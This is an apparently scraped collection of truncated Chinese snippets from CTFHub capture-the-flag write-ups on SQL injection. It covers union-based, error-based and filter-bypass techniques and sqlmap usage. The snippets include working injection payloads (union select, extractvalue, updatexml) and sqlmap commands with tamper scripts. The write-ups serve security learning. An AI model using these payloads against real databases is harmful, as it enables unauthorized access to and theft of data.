id=-1unionselect1,flagfromsqli.flag 2.字符型注入 判断闭合符号 可以看出是单引号闭合 判断字段数 ?id=1' order by 2-- + 查回显位,1和2都是 ?id=-1' unionselect1,2-- + 查数据库名,为sqli ?id=-1' unionselect1,database()-- + 查表名,为flag和news ?id=-1'unionselect1,group_concat...
id=1%27 -T flag --columns --dump 手工注入: 联合查询 (三)报错注入 1.知识点 报错注入的原理在于三个函数:count(*),rand(),floor()以及group by floor()函数的作用是返回小于等于该值的最大整数,也可以理解为向下取整,只保留整数部分。 rand()函数可以用来生成0或1,但是rand(0)和rand()还是有本质区...
SQLmap 一、爆数据库 python sqlmap.py-u"http://challenge-ba6a5630047ce20b.sandbox.ctfhub.com:10800/?id=1"--dbs --tamper "space2comment.py" 1. 说明: space2comment.py 1. 这是一个脚本,作用:是为了用/**/替换空格字符’ ‘ 在sqlmap中为了绕过过滤,在tamper中...
字符型注入 代码语言:javascript 复制 #查看页面变化,判断sql注入类别【为字符型注入】 1 #确定字段数【字段数为2】 1' order by 1 # 1' order by 2 # 1' order by 3 # #确定字段顺序 -1' union select 1,2 # #爆数据库名【sqli】 -1' union select 1,database() # 或者将#改为--空格#爆...
CTFHubWeb技能树web前置技能 HTTP协议 请求⽅式 使⽤bp抓包,send to repeater。将开头的GET更改成CTFHUB,点击send。在response中获得flag。另外还可以⽤curl命令来获得flag,具体可以看官⽅的writeup。302跳转 ⽤bp抓包,点击Give me Flag的链接,send to repeater。在response中获得flag。cookie 依旧是⽤bp...
SQL注入 整数型注入 字符型注入 报错注入 extractvalue函数报错: 1 and ( extractvalue( 'anything',concat( '~', (select database()) ) ) ); updatexml函数报错: 1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) 只能显示32位: ...
SQL注入学习记录 CTFHub SQL注入 整数型注入 首先进入界面可以看见这样: 很明显输入框就是注入口,分别输入1,1 and 1=1,1 and 1=2 后者返回值与前两者不同,说明存在注入点。 然后通过order by x找出该数据表的字段数量,输入1 order by 1,1 order by 2,返回结果相同,输入1 order by 3返回结果不同,证明...
CtfHub-web-sql注入 得到flag。 8.UA注入打开题目给出了提示这里直接爆出字段查看数据库和版本得到了表名,查看字段名 下面就获取flag。 9.refer注入抓包丢repeater,爆出字段数量,套路还是跟之前的一样,这次还少了后面的注释!查看版本和库名爆出表名,继续爆出字段名 继续爆出flag。 到这里整个sql注入就结束了,我会...
CTFHub题解-技能树-Web(SQL注入-过滤空格),文章目录前言过滤空格SQLmap前言在本文中将会采用两种注入手法:SQLmap和手注,当然记录这篇文章主要是对SQLmap的使用进行一下学习过滤空格既
一般来讲SQL注入的话首先要识别注入点。一个是看能不能注入另外一个是看是什么类型的注入比如说字符,数字,搜索(?)等等 GET、POST、HEADER 专门针对一个waf进行测试的时候就要将这几个点全测试个遍,header中还包括C... 201721430032 0 548 Web安全测试学习笔记-DVWA-CSRF 2019-12-06 16:48 − CSRF(...